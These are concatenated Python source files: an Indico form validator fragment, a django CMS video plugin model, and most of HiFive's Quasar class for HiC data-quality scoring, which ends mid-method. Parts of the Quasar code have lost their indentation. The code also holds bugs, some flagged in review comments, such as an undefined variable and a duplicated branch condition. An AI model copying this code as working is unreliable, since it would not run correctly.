    Like the WTForms `Regexp` validator, but supports populating the
    HTML5 `pattern` attribute (the regex may not use any non-standard
    Python extensions such as named groups in this case).
    """
    def __init__(self, *args, **kwargs):
        # `client_side` controls whether the pattern is exposed to the browser.
        self.client_side = kwargs.pop('client_side', True)
        super(IndicoRegexp, self).__init__(*args, **kwargs)
| DavidAndreev/indico | indico/web/forms/validators.py | Python | gpl-3.0 | 11,906 |
import re
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin
from cms.plugins.video import settings
from os.path import basename
class Video(CMSPlugin):
    """django CMS plugin model holding a video's source and player appearance."""
    # player settings
    # Either `movie` (uploaded file) or `movie_url` (external URL) is used.
    movie = models.FileField(_('movie file'), upload_to=CMSPlugin.get_media_path, help_text=_('use .flv file or h264 encoded video file'), blank=True, null=True)
    movie_url = models.CharField(_('movie url'), max_length=255, help_text=_('vimeo or youtube video url. Example: http://www.youtube.com/watch?v=YFa59lK-kpo'), blank=True, null=True)
    image = models.ImageField(_('image'), upload_to=CMSPlugin.get_media_path, help_text=_('preview image file'), null=True, blank=True)
    width = models.PositiveSmallIntegerField(_('width'))
    height = models.PositiveSmallIntegerField(_('height'))
    auto_play = models.BooleanField(_('auto play'), default=settings.VIDEO_AUTOPLAY)
    auto_hide = models.BooleanField(_('auto hide'), default=settings.VIDEO_AUTOHIDE)
    fullscreen = models.BooleanField(_('fullscreen'), default=settings.VIDEO_FULLSCREEN)
    loop = models.BooleanField(_('loop'), default=settings.VIDEO_LOOP)
    # plugin settings
    # All colors are 6-digit hex strings without the leading '#'.
    bgcolor = models.CharField(_('background color'), max_length=6, default=settings.VIDEO_BG_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    textcolor = models.CharField(_('text color'), max_length=6, default=settings.VIDEO_TEXT_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    seekbarcolor = models.CharField(_('seekbar color'), max_length=6, default=settings.VIDEO_SEEKBAR_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    seekbarbgcolor = models.CharField(_('seekbar bg color'), max_length=6, default=settings.VIDEO_SEEKBARBG_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    loadingbarcolor = models.CharField(_('loadingbar color'), max_length=6, default=settings.VIDEO_LOADINGBAR_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    buttonoutcolor = models.CharField(_('button out color'), max_length=6, default=settings.VIDEO_BUTTON_OUT_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    buttonovercolor = models.CharField(_('button over color'), max_length=6, default=settings.VIDEO_BUTTON_OVER_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    buttonhighlightcolor = models.CharField(_('button highlight color'), max_length=6, default=settings.VIDEO_BUTTON_HIGHLIGHT_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
    def __unicode__(self):
        # Display the base name of whichever source (file or URL) is set.
        if self.movie:
            name = self.movie.path
        else:
            name = self.movie_url
        return u"%s" % basename(name)
    def get_height(self):
        # Height as a string, as expected by the player template.
        return "%s" % (self.height)
    def get_width(self):
        # Width as a string, as expected by the player template.
        return "%s" % (self.width)
    def get_movie(self):
        # Prefer the uploaded file's URL over the external movie URL.
        if self.movie:
            return self.movie.url
        else:
            return self.movie_url
#!/usr/bin/env python
"""A class for determining HiC data quality."""
import os
import sys
from math import ceil, floor
import numpy
import h5py
from scipy.optimize import curve_fit
try:
from mpi4py import MPI
except:
pass
try:
from pyx import *
unit.set(defaultunit="cm")
text.set(mode="latex")
except:
pass
import libraries._quasar as _quasar
class Quasar(object):
"""This class performs subsampling and QuASAR transformations for calculating HiC quality.
.. note::
This class is also available as hifive.Quasar
When initialized, this class creates an h5dict in which to store all data associated with this object.
:param filename: The file name of the h5dict to store the QuASAR-transformed data in.
:type filename: str.
:param mode: The mode to open the h5dict with. This should be 'w' for creating or overwriting an h5dict with name given in filename.
:type mode: str.
:param silent: Indicates whether to print information about function execution for this object.
:type silent: bool.
:returns: :class:`Quasar` class object.
"""
    def __init__(self, filename, mode='a', silent=False):
        """Create a :class:`Quasar` object."""
        # Use MPI when mpi4py imported successfully; otherwise run
        # single-process as rank 0.
        try:
            self.comm = MPI.COMM_WORLD
            self.rank = self.comm.Get_rank()
            self.num_procs = self.comm.Get_size()
        except:
            self.comm = None
            self.rank = 0
            self.num_procs = 1
        self.file = os.path.abspath(filename)
        self.hic_fname = None
        self.silent = silent
        self.filetype = 'quasar'
        # Strict/loose cutoffs for quality (q) and replicate (r) scores.
        self.strict_qcutoff = 0.05798399
        self.loose_qcutoff = 0.04345137
        self.strict_rcutoff = 0.85862067
        self.loose_rcutoff = 0.80026913
        if mode != "w":
            self.load(mode)
        else:
            # Only the root process holds an open h5py handle.
            if self.rank == 0:
                self.storage = h5py.File(self.file, 'w')
            else:
                self.storage = None
        return None
def __getitem__(self, key):
"""Dictionary-like lookup."""
if key in self.__dict__:
return self.__dict__[key]
else:
return None
def __setitem__(self, key, value):
"""Dictionary-like value setting."""
self.__dict__[key] = value
return None
    def save(self):
        """
        Save analysis parameters to h5dict.
        :returns: None
        """
        # Only the root process owns the h5dict.
        if self.rank != 0:
            return None
        for key in self.__dict__.keys():
            # Skip runtime-only attributes that should not be persisted.
            if key in ['file', 'storage', 'silent', 'comm', 'rank', 'num_procs']:
                continue
            elif self[key] is None:
                continue
            elif isinstance(self[key], numpy.ndarray):
                # Arrays replace any previously stored dataset of the same name.
                if key in self.storage:
                    del self.storage[key]
                self.storage.create_dataset(key, data=self[key])
            elif isinstance(self[key], list):
                if isinstance(self[key][0], numpy.ndarray):
                    # NOTE(review): `chroms` is not defined in this scope, so
                    # this branch raises NameError if ever taken -- confirm the
                    # intended per-chromosome dataset naming.
                    for i in range(len(self[key])):
                        self.storage.create_dataset("%s.%s" % (key, chroms[i]), data=self[key][i])
            elif not isinstance(self[key], dict):
                # Scalars/strings are stored as file-level attributes.
                self.storage.attrs[key] = self[key]
        return None
    def load(self, mode='a'):
        """
        Load data from h5dict specified at object creation.
        Any call of this function will overwrite current object data with values from the last :func:`save` call.
        :param mode: The mode to open the h5dict with.
        :type mode: str.
        :returns: None
        """
        # Only the root process opens the h5dict.
        if self.rank != 0:
            self.storage = None
            return None
        self.storage = h5py.File(self.file, mode)
        for key in self.storage.keys():
            # Transformed-matrix datasets (valid/dist/corr) are read on demand.
            if key.split('.')[0] in ['valid', 'dist', 'corr']:
                continue
            self[key] = numpy.copy(self.storage[key])
        for key in self.storage['/'].attrs.keys():
            self[key] = self.storage['/'].attrs[key]
        return None
def close(self):
"""
Close h5dict file.
:returns: None
"""
if self.rank == 0:
self.storage.close()
return None
    def find_transformation(self, hic, chroms=[], resolutions=[1000000, 200000, 40000, 10000],
                            coverages=[0, 40000000, 20000000, 10000000, 5000000, 2000000, 1000000], seed=None):
        """
        Find QuASAR transformation from the specified HiC project.
        :param hic: The HiC project from which to calculate QuASAR transformations from. If this function has been previously called with a different HiC project, the current transformed matrices will be deleted prior to calculating new matrices.
        :type hic: class:`HiC` class object.
        :param chroms: A list of chromosome names to calculate transformed matrices from. If this is an empty list, all chromosomes from the HiC object will be used.
        :type chroms: list
        :param resolutions: A list of binning resolutions to find transformed matrices for.
        :type resolutions: list
        :param coverages: A list of cis read counts to downsample to prior to finding transformed matrices. A value of 0 indicates to use all reads. Coverages are calculated across only chromosomes specified in the 'chroms' argument.
        :type coverages: list
        :param seed: An integer to use as the initialization value for the random number generator.
        :returns: :class:`Quasar` class object.
        """
        if self.rank == 0:
            coverages = numpy.array(coverages, dtype=numpy.int64)
            resolutions = numpy.array(resolutions, dtype=numpy.int64)
            resolutions.sort()
            hic_fname = hic.file
            # A new HiC source invalidates all previously stored matrices.
            if self.hic_fname is not None and self.hic_fname != hic_fname:
                for key in self.storage.keys():
                    if key.split('.')[0] in ['valid', 'dist', 'corr']:
                        del self.storage[key]
                if 'chromosomes' in self.storage:
                    del self.storage['chromosomes']
            self.hic_fname = hic_fname
            if seed is not None:
                RNG = numpy.random.RandomState(seed=seed)
            else:
                RNG = numpy.random.RandomState()
            # load partition information
            if 'binned' in hic.__dict__ and hic.binned is not None:
                temp_mids = hic.fends['bins']['mid'][...]
                chr_indices = hic.fends['bin_indices'][...]
            else:
                temp_mids = hic.fends['fends']['mid'][...]
                chr_indices = hic.fends['chr_indices'][...]
            # fill in chromosome list if empty. Otherwise check that all specified chromosomes exist.
            if not isinstance(chroms, list) or len(chroms) == 0:
                chroms = hic.fends['chromosomes'][...]
            # Drop chromosomes with no fends or no cis reads.
            valid = numpy.ones(chroms.shape[0], dtype=numpy.bool)
            for i in range(chroms.shape[0]):
                if chr_indices[i + 1] - chr_indices[i] == 0:
                    valid[i] = False
                elif hic.data['cis_indices'][chr_indices[i + 1]] - hic.data['cis_indices'][chr_indices[i]] == 0:
                    valid[i] = False
            chroms = chroms[valid]
            # Load raw counts
            bounds = numpy.zeros((len(chroms), 2), numpy.int64)
            for i, chrom in enumerate(chroms):
                chrint = hic.chr2int[chrom]
                bounds[i, 0] = hic.data['cis_indices'][chr_indices[chrint]]
                bounds[i, 1] = hic.data['cis_indices'][chr_indices[chrint + 1]]
            raw = numpy.zeros((numpy.sum(bounds[:, 1] - bounds[:, 0]), 3), dtype=numpy.int64)
            indices = numpy.zeros(len(chroms) + 1, dtype=numpy.int64)
            mids = {}
            starts = numpy.zeros(len(chroms), dtype=numpy.int32)
            for i, chrom in enumerate(chroms):
                chrint = hic.chr2int[chrom]
                indices[i + 1] = indices[i] + bounds[i, 1] - bounds[i, 0]
                temp = hic.data['cis_data'][bounds[i, 0]:bounds[i, 1], :]
                # Shift fend indices to be chromosome-local.
                temp[:, :2] -= chr_indices[chrint]
                raw[indices[i]:indices[i + 1], :] = temp
                mids[chrom] = temp_mids[chr_indices[chrint]:chr_indices[chrint + 1]]
                starts[i] = mids[chrom][0]
            # only consider coverage levels that are less than or equal to the number of cis reads
            coverages = coverages[numpy.where(numpy.sum(raw[:, 2]) >= coverages)]
            coverages.sort()
            # Move the 0 ("all reads") entry to the end of the sorted list.
            if coverages[0] == 0:
                coverages[:-1] = coverages[1:]
                coverages[-1] = 0
            store_coverages = numpy.copy(coverages)
            total_reads = numpy.sum(raw[:, 2])
            if coverages.shape[0] > 0 and coverages[-1] == 0:
                coverages[-1] = total_reads
            # Process from highest to lowest coverage so downsampling is cumulative.
            coverages = coverages[::-1]
        else:
            coverages = None
            resolutions = None
        # Share the work parameters with all MPI ranks.
        if self.comm is not None:
            coverages = self.comm.bcast(coverages, root=0)
            resolutions = self.comm.bcast(resolutions, root=0)
            chroms = self.comm.bcast(chroms, root=0)
        if coverages.shape[0] == 0:
            return None
        if self.rank == 0:
            # write arguements to h5dict
            if 'chromosomes' in self.storage:
                del self.storage['chromosomes']
            self.storage.create_dataset(name='chromosomes', data=numpy.array(chroms))
            if 'resolutions' in self.storage:
                del self.storage['resolutions']
            self.storage.create_dataset(name='resolutions', data=numpy.array(resolutions))
            if 'coverages' in self.storage:
                del self.storage['coverages']
            self.storage.create_dataset(name='coverages', data=numpy.array(store_coverages))
            if 'starts' in self.storage:
                del self.storage['starts']
            self.storage.create_dataset(name='starts', data=starts)
            self.storage.attrs['total_reads'] = total_reads
        # rebin data to highest resolution for faster processing
        # NOTE(review): this section uses `starts`, `mids`, `raw` and `indices`,
        # which are only assigned on rank 0 -- non-root ranks would hit a
        # NameError here; confirm the intended MPI execution path.
        remapped = {}
        new_mids = {}
        new_indices = numpy.zeros(len(chroms) + 1, dtype=numpy.int64)
        for i, chrom in enumerate(chroms):
            start = (starts[i] / resolutions[0]) * resolutions[0]
            stop = ((mids[chrom][-1] - 1) / resolutions[0] + 1) * resolutions[0]
            N = (stop - start) / resolutions[0]
            mapping = (mids[chrom] - start) / resolutions[0]
            raw[indices[i]:indices[i + 1], 0] = mapping[raw[indices[i]:indices[i + 1], 0]]
            raw[indices[i]:indices[i + 1], 1] = mapping[raw[indices[i]:indices[i + 1], 1]]
            # Collapse duplicate bin pairs, summing their counts.
            new_index = numpy.unique(raw[indices[i]:indices[i + 1], 0] * N + raw[indices[i]:indices[i + 1], 1])
            index = numpy.searchsorted(new_index, raw[indices[i]:indices[i + 1], 0] * N +
                                       raw[indices[i]:indices[i + 1], 1])
            remapped[chrom] = numpy.zeros((new_index.shape[0], 3), dtype=numpy.int64)
            remapped[chrom][:, 0] = new_index / N
            remapped[chrom][:, 1] = new_index % N
            remapped[chrom][:, 2] = numpy.bincount(index, weights=raw[indices[i]:indices[i + 1], 2])
            new_indices[i + 1] = new_index.shape[0] + new_indices[i]
            new_mids[chrom] = (start + resolutions[0] / 2 + numpy.arange(N) *
                               resolutions[0]).astype(numpy.int32)
        indices = new_indices.astype(numpy.int64)
        mids = new_mids
        raw = numpy.zeros((indices[-1], 3), dtype=numpy.int64)
        for i, chrom in enumerate(chroms):
            raw[indices[i]:indices[i + 1], :] = remapped[chrom]
        del remapped
        # cycle through coverages
        for c, cov in enumerate(coverages):
            if self.rank == 0:
                if not self.silent:
                    print >> sys.stderr, ("\r%s\rDownsampling to %i coverage") % (' ' * 120, cov),
                raw, indices = self._downsample(raw, indices, cov, RNG)
            # cycle through resolutions
            for r, res in enumerate(resolutions):
                # For each chromosome, normalize and find distance-corrected matrix
                for h, chrom in enumerate(chroms):
                    if self.rank == 0:
                        # Coverage equal to the full read count is stored as '0C'.
                        if cov == total_reads:
                            key = '%s.0C.%iR' % (chrom, res)
                        else:
                            key = '%s.%iC.%iR' % (chrom, cov, res)
                        # Skip combinations that were already computed and stored.
                        if 'valid.%s' % key in self.storage:
                            if self.comm is not None:
                                skip = self.comm.bcast(True, root=0)
                            continue
                        if not self.silent:
                            print >> sys.stderr, ("\r%s\rCoverage %i Resolution %i Chrom %s - Normalizing counts") % (
                                ' ' * 120, cov, res, chrom),
                        norm, dist, valid_rows = self._normalize(chrom, raw[indices[h]:indices[h + 1]], mids[chrom], res)
                        if not self.silent:
                            print >> sys.stderr, ("\r%s\rCoverage %i Resolution %i - Correlating chrom %s") % (
                                ' ' * 120, cov, res, chrom),
                        corrs = self._find_correlations(norm, valid_rows)
                        # write resulting matrices to hdf5 file
                        if not self.silent:
                            print >> sys.stderr, ("\r%s\rCoverage %i Resolution %i Chrom %s - Writing results") % (
                                ' ' * 120, cov, res, chrom),
                        if corrs is None:
                            self.storage.attrs['%s.invalid' % (key)] = True
                        else:
                            self.storage.create_dataset(name="valid.%s" % (key), data=valid_rows)
                            self.storage.create_dataset(name="dist.%s" % (key), data=dist)
                            self.storage.create_dataset(name="corr.%s" % (key), data=corrs)
                    else:
                        # Worker ranks wait for the skip flag, then assist with
                        # the correlation computation.
                        skip = self.comm.bcast(None, root=0)
                        if skip:
                            continue
                        self._find_correlations()
        if self.rank == 0 and not self.silent:
            print >> sys.stderr, ("\r%s\r") % (' ' * 120),
        return None
    def find_quality_scores(self, chroms=[]):
        """
        Find QuASAR quality scores across whole dataset.
        :param chroms: A list of chromosome names to calculate quality scores for.
        :type chroms: list
        :returns: A structured numpy array with the fields 'chromosome', 'resolution', 'coverage', and 'score'.
        """
        # Only the root process holds the h5dict.
        if self.rank > 0:
            return None
        if 'chromosomes' not in self.storage:
            return None
        # Restrict to stored chromosomes (all of them when chroms is empty).
        if len(chroms) == 0:
            chroms = self.storage['chromosomes'][...]
        else:
            chroms = numpy.intersect1d(self.storage['chromosomes'][...], numpy.array(chroms))
        coverages = self.storage['coverages'][...]
        tcoverages = numpy.copy(coverages)
        if tcoverages[-1] == 0:
            tcoverages[-1] = self.storage.attrs['total_reads']
        resolutions = self.storage['resolutions'][...]
        # scores[res, cov, chrom]; the extra final slot holds the dataset-wide score.
        scores = numpy.zeros((resolutions.shape[0], coverages.shape[0], chroms.shape[0] + 1), dtype=numpy.float64)
        scores.fill(numpy.nan)
        for j, res in enumerate(resolutions):
            for k, cov in enumerate(coverages):
                # Running sums (trans, dists, corrs, N) across chromosomes.
                temp = numpy.zeros(4, dtype=numpy.float64)
                for i, chrom in enumerate(chroms):
                    key = '%s.%iC.%iR' % (chrom, cov, res)
                    if 'valid.%s' % key in self.storage:
                        valid_rows = self.storage['valid.%s' % key][...]
                        dists = (1 + self.storage['dist.%s' % key][...]) ** 0.5
                        corrs = self.storage['corr.%s' % key][...]
                        valid = numpy.zeros(corrs.shape, dtype=numpy.bool)
                        N, M = dists.shape
                        corrs = corrs[:, :M]
                        # Entry (row, offset) is valid when both interacting
                        # rows are valid and the values are finite.
                        valid = numpy.zeros((N, M), dtype=numpy.int32)
                        for l in range(min(N - 1, M)):
                            P = N - l - 1
                            valid[:P, l] = valid_rows[(l + 1):] * valid_rows[:P]
                        valid[numpy.where((numpy.abs(dists) == numpy.inf) | (numpy.abs(corrs) == numpy.inf))] = 0
                        where = numpy.where(valid)
                        N = where[0].shape[0]
                        if N > 0:
                            # Score = distance-weighted mean corr minus unweighted mean corr.
                            trans = numpy.sum(corrs[where] * dists[where])
                            corrs = numpy.sum(corrs[where])
                            dists = numpy.sum(dists[where])
                            scores[j, k, i] = trans / dists - corrs / N
                            temp += [trans, dists, corrs, N]
                scores[j, k, -1] = temp[0] / temp[1] - temp[2] / temp[3]
        all_chroms = numpy.r_[chroms, numpy.array(['All'])]
        # Flatten into a structured record array, one row per (res, cov, chrom).
        results = numpy.zeros(scores.shape[0] * scores.shape[1] * scores.shape[2], dtype=numpy.dtype([
            ('chromosome', all_chroms.dtype), ('resolution', numpy.int64), ('coverage', numpy.int64), ('score', numpy.float64)]))
        results['score'] = scores.ravel(order='C')
        results['resolution'] = numpy.repeat(resolutions, scores.shape[1] * scores.shape[2])
        results['coverage'] = numpy.tile(numpy.repeat(coverages, scores.shape[2]), scores.shape[0])
        results['chromosome'] = numpy.tile(all_chroms, scores.shape[0] * scores.shape[1])
        return results
def find_replicate_scores(self, replicate, chroms=[]):
"""
Find QuASAR replicate scores across whole dataset.
:param replicate: A class:`Quasar` object to calculate replicate scores with. If this function has been previously called with a different sample, the current transformed matrices will be deleted prior to calculating new matrices.
:type replicate: class:`Quasar` class object.
:param chroms: A list of chromosome names to calculate replicate scores for.
:type chroms: list
:returns: A structured numpy array with the fields 'resolution', 'coverage', and 'score'.
"""
if self.rank > 0:
return None
if 'chromosomes' not in self.storage or 'chromosomes' not in replicate.storage:
return None
if len(chroms) == 0:
chroms = numpy.intersect1d(self.storage['chromosomes'][...], replicate.storage['chromosomes'][...])
else:
chroms = numpy.intersect1d(self.storage['chromosomes'][...], numpy.array(chroms))
chroms = numpy.intersect1d(chroms, replicate.storage['chromosomes'][...])
resolutions = numpy.intersect1d(self.storage['resolutions'][...], replicate.storage['resolutions'][...])
coverages = numpy.intersect1d(self.storage['coverages'][...], replicate.storage['coverages'][...])
if coverages[0] == 0:
coverages[:-1] = coverages[1:]
coverages[-1] = 0
tcoverages = numpy.copy(coverages)
if tcoverages[-1] == 0:
tcoverages[-1] = (self.storage.attrs['total_reads'] + replicate.storage.attrs['total_reads']) / 2
starts1 = numpy.zeros(chroms.shape[0], dtype=numpy.int64)
starts2 = numpy.zeros(chroms.shape[0], dtype=numpy.int64)
for i, chrom in enumerate(chroms):
starts1[i] = numpy.where(self.storage['chromosomes'][...] == chrom)[0][0]
starts2[i] = numpy.where(replicate.storage['chromosomes'][...] == chrom)[0][0]
scores = numpy.zeros((resolutions.shape[0], coverages.shape[0], chroms.shape[0] + 1), dtype=numpy.float64)
scores.fill(numpy.nan)
for j, res in enumerate(resolutions):
for k, cov in enumerate(coverages):
temp = numpy.zeros(6, dtype=numpy.float64)
for i, chrom in enumerate(chroms):
key = '%s.%iC.%iR' % (chrom, cov, res)
if 'valid.%s' % key in self.storage and 'valid.%s' % key in replicate.storage:
valid_rows1 = self.storage['valid.%s' % key][...]
dists1 = (1 + self.storage['dist.%s' % key][...]) ** 0.5
corrs1 = self.storage['corr.%s' % key][...][:, :dists1.shape[1]]
valid1 = numpy.zeros(corrs1.shape, dtype=numpy.bool)
N, M = corrs1.shape
for l in range(min(N - 1, M)):
P = N - l - 1
valid1[:P, l] = valid_rows1[(l + 1):] * valid_rows1[:P]
valid1[numpy.where((numpy.abs(dists1) == numpy.inf) | (numpy.abs(corrs1) == numpy.inf))] = 0
valid_rows2 = replicate.storage['valid.%s' % key][...]
dists2 = (1 + replicate.storage['dist.%s' % key][...]) ** 0.5
corrs2 = replicate.storage['corr.%s' % key][...][:, :dists2.shape[1]]
valid2 = numpy.zeros(corrs2.shape, dtype=numpy.bool)
N, M = corrs2.shape
for l in range(min(N - 1, M)):
P = N - l - 1
valid2[:P, l] = valid_rows2[(l + 1):] * valid_rows2[:P]
valid2[numpy.where((numpy.abs(dists2) == numpy.inf) | (numpy.abs(corrs2) == numpy.inf))] = 0
start1 = starts1[i]
start2 = starts2[i]
if start2 > start1:
start1 = (start2 - start1) / res
start2 = 0
elif start2 > start1:
start2 = (start1 - start2) / res
start1 = 0
else:
start1 = 0
start2 = 0
stop1 = corrs1.shape[0] - start1
stop2 = corrs2.shape[0] - start2
if stop2 > stop1:
stop2 = stop1 + start2
stop1 = start1 + stop1
else:
stop1 = stop2 + start1
stop2 = start2 + stop2
stop3 = min(corrs1.shape[1], corrs2.shape[1])
valid1 = valid1[start1:stop1, :stop3]
valid2 = valid2[start2:stop2, :stop3]
valid = numpy.where(valid1 & valid2)
if valid[0].shape[0] == 0:
continue
trans1 = corrs1[start1:stop1, :stop3][valid] * dists1[start1:stop1, :stop3][valid]
trans2 = corrs2[start2:stop2, :stop3][valid] * dists2[start2:stop2, :stop3][valid]
X = numpy.sum(trans1)
Y = numpy.sum(trans2)
X2 = numpy.sum(trans1 ** 2.0)
Y2 = numpy.sum(trans2 ** 2.0)
XY = numpy.sum(trans1 * trans2)
N = valid[0].shape[0]
if N == 0:
continue
temp += [X, Y, X2, Y2, XY, N]
Xmu = X / N
Ymu = Y / N
X2mu = X2 / N
Y2mu = Y2 / N
XYmu = XY / N
if Xmu ** 2.0 > X2mu or Ymu ** 2.0 > Y2mu:
continue
Xstd = (X2mu - Xmu ** 2.0) ** 0.5
Ystd = (Y2mu - Ymu ** 2.0) ** 0.5
if Xstd == 0 or Ystd == 0:
continue
scores[j, k, i] = (XYmu - Xmu * Ymu) / (Xstd * Ystd)
Xmu = temp[0] / temp[5]
Ymu = temp[1] / temp[5]
X2mu = temp[2] / temp[5]
Y2mu = temp[3] / temp[5]
XYmu = temp[4] / temp[5]
Xstd = (X2mu - Xmu ** 2.0) ** 0.5
Ystd = (Y2mu - Ymu ** 2.0) ** 0.5
scores[j, k, -1] = (XYmu - Xmu * Ymu) / (Xstd * Ystd)
all_chroms = numpy.r_[chroms, numpy.array(['All'])]
results = numpy.zeros(scores.shape[0] * scores.shape[1] * scores.shape[2], dtype=numpy.dtype([
('chromosome', all_chroms.dtype), ('resolution', numpy.int64), ('coverage', numpy.int64), ('score', numpy.float64)]))
results['score'] = scores.ravel(order='C')
results['resolution'] = numpy.repeat(resolutions, scores.shape[1] * scores.shape[2])
results['coverage'] = numpy.tile(numpy.repeat(coverages, scores.shape[2]), scores.shape[0])
results['chromosome'] = numpy.tile(all_chroms, scores.shape[0] * scores.shape[1])
return results
def print_report(self, filename, qscores=None, rscores=None, scores_only=False):
"""
Write QuASAR scores to output file.
:param filename: The location to write the report to. The suffix will be used to determine the output format.
:type filename: str.
:returns: None
"""
if self.rank > 0:
return None
if qscores is None and rscores is None:
if not self.silent:
print >> sys.stderr, ("\r%s\rNo scores found. Calculate quality and/or replicate scores first.\n") % (
' ' * 80),
return None
format = filename.split('.')[-1]
if format not in ['pdf', 'txt']:
format = 'txt'
if format == 'txt':
self._print_txt_report(filename, qscores, rscores, scores_only)
elif format == 'pdf':
if 'pyx' in sys.modules.keys():
self._print_pdf_report(filename, qscores, rscores, scores_only)
elif not self.silent:
print >> sys.stderr, ("\r%s\rThe pyx package is needed for writing PDFs.\n") % (' ' * 80),
else:
self._print_html_report(filename, qscores, rscores, scores_only)
return None
    def _transfer_dict(self, data, dest, source):
        """
        Transfer a dictionary of numpy arrays from one MPI process to another.

        Uses a simple tagged protocol: tag 5 carries the key (or False as an
        end-of-transfer sentinel), tag 6 carries the (shape, dtype) metadata
        (or (None, None) for a None value), and tag 7 carries the raw array
        buffer.

        :param data: Dictionary mapping keys to numpy arrays or None values;
            filled in place on the destination process.
        :param dest: Rank of the receiving process.
        :param source: Rank of the sending process.
        :returns: None

        NOTE(review): a falsy key (e.g. '' or 0) would terminate the receive
        loop early — keys are assumed to be non-empty strings.
        """
        if self.rank == dest:
            # Receive (key, metadata, buffer) triples until the sender
            # transmits the False sentinel in place of a key.
            key = self.comm.recv(source=source, tag=5)
            while key:
                shape, dtype = self.comm.recv(source=source, tag=6)
                if shape is None:
                    data[key] = None
                else:
                    # Allocate the destination buffer, then receive into it.
                    data[key] = numpy.zeros(shape, dtype=dtype)
                    self.comm.Recv(data[key], source=source, tag=7)
                key = self.comm.recv(source=source, tag=5)
        elif self.rank == source:
            for key, value in data.iteritems():
                self.comm.send(key, dest=dest, tag=5)
                if value is None:
                    self.comm.send([None, None], dest=dest, tag=6)
                else:
                    self.comm.send([value.shape, value.dtype], dest=dest, tag=6)
                    self.comm.Send(value, dest=dest, tag=7)
            # Signal end of transfer.
            self.comm.send(False, dest=dest, tag=5)
        return None
def _downsample(self, data, indices, target_count, rng=None):
if target_count == 0:
return numpy.copy(data), numpy.copy(indices)
elif numpy.sum(data[:, 2]) == target_count:
return numpy.copy(data), numpy.copy(indices)
if rng is None:
rng = numpy.random.RandomState()
initial_count = numpy.sum(data[:, 2])
percent = target_count / float(initial_count)
# select which reads to keep, based on percent of reads to keep
keep = rng.rand(initial_count) < percent
# adjust mismatch between selected read count and target read count by selecting reads to add/remove
kept = numpy.sum(keep)
if kept > target_count:
pool_size = kept
adjust_size = kept - target_count
remove = True
elif kept < target_count:
pool_size = initial_count - kept
adjust_size = target_count - kept
remove = False
else:
adjust_size = 0
reads = {}
while len(reads) < adjust_size:
temp_rand = rng.randint(0, pool_size, adjust_size * 2)
for i in range(temp_rand.shape[0]):
reads[temp_rand[i]] = None
if len(reads) == adjust_size:
break
if adjust_size > 0:
if remove:
where = numpy.where(keep)[0]
for i in where[reads.keys()]:
keep[i] = False
else:
where = numpy.where(numpy.logical_not(keep))[0]
for i in where[reads.keys()]:
keep[i] = True
# adjust read counts in data
counts = numpy.repeat(numpy.arange(data.shape[0]), data[:, 2])
new_data = numpy.copy(data)
new_data[:, 2] = numpy.bincount(counts, weights=keep, minlength=data.shape[0])
new_indices = numpy.zeros(indices.shape[0], dtype=numpy.int64)
for i in range(1, new_indices.shape[0]):
new_indices[i] = numpy.sum(new_data[indices[i - 1]:indices[i], 2] > 0) + new_indices[i - 1]
new_data = new_data[numpy.where(new_data[:, 2] > 0)[0], :]
return new_data, new_indices
    def _normalize(self, chrom, raw, mids, binsize):
        """
        Prepare a single chromosome's data for correlation calculation:
        aggregate counts to the requested bin size, filter out sparsely
        observed rows, and normalize by the distance-dependent background.

        :param chrom: Chromosome name (not referenced within this method).
        :param raw: Interaction array; assumes columns are (bin1 index,
            bin2 index, count) — TODO confirm against caller.
        :param mids: Evenly spaced bin coordinates for the current binning of
            'raw'; spacing defines the current bin size.
        :param binsize: Bin size to aggregate the data into.
        :returns: Tuple of (norm, dist, valid_rows) arrays, or
            (None, None, None) if no rows survive filtering.
        """
        # Number of off-diagonal bins considered on each side of a bin.
        width = 100
        # downbin if necessary
        curr_binsize = mids[1] - mids[0]
        if curr_binsize != binsize:
            # Map each old bin to its new (larger) bin and sum counts that
            # collapse onto the same (bin1, bin2) pair.
            mapping = mids / binsize
            mapping -= mapping[0]
            N = mapping[-1] + 1
            indices = mapping[raw[:, 0]] * N + mapping[raw[:, 1]]
            uindices = numpy.unique(indices)
            data = numpy.zeros((uindices.shape[0], 3), dtype=numpy.int64)
            data[:, 0] = uindices / N
            data[:, 1] = uindices % N
            data[:, 2] = numpy.bincount(numpy.searchsorted(uindices, indices), weights=raw[:, 2])
        else:
            data = raw
            N = mids.shape[0]
        # filter rows with too few observations
        prev_valid_rows = N + 1
        valid_rows = numpy.ones(N, dtype=numpy.int32)
        # we need several non-zero observations for finding correlations
        # Iterate to a fixed point: invalidating a row can push neighboring
        # rows below the observation cutoff on the next pass.
        while numpy.sum(valid_rows) < prev_valid_rows:
            prev_valid_rows = numpy.sum(valid_rows)
            sums = numpy.zeros(N, dtype=numpy.int32)
            # C extension fills 'sums' with per-row observation counts,
            # considering only currently valid rows within 'width' bins.
            _quasar.filter_bins(
                data,
                sums,
                valid_rows,
                width)
            valid_rows[:] = sums >= 1
        valid = numpy.where(valid_rows)[0]
        if valid.shape[0] == 0:
            return None, None, None
        # find distance dependent signal and compact data array for weighting correlation matrix
        bg = numpy.ones(width, dtype=numpy.float64)
        temp = numpy.zeros((width, 2), dtype=numpy.int64)
        dist = numpy.zeros((N, min(width, N - 1)), dtype=numpy.float64)
        norm = numpy.zeros((N, width * 2), dtype=numpy.float64)
        # C extension fills 'bg', 'dist', and 'norm' in place.
        _quasar.find_bg_dist_norm(
            data,
            valid_rows,
            temp,
            bg,
            dist,
            norm)
        # remove bg from norm
        # Each norm row holds 'width' upstream then 'width' downstream
        # neighbors, so the background is applied reversed on the left half.
        for i in range(N):
            norm[i, :width] /= bg[::-1]
            norm[i, width:] /= bg
        return norm, dist, valid_rows
def _find_correlations(self, norm=None, vrows=None):
width = 100
if self.rank == 0:
if norm is None:
if self.comm is not None:
err = self.comm.bcast(True, root=0)
return None
N = norm.shape[0]
if self.comm is not None:
N = self.comm.bcast(N, root=0)
self.comm.Bcast(vrows, root=0)
node_ranges = numpy.round(numpy.linspace(0, N, self.num_procs + 1)).astype(numpy.int32)
for i in range(1, self.num_procs):
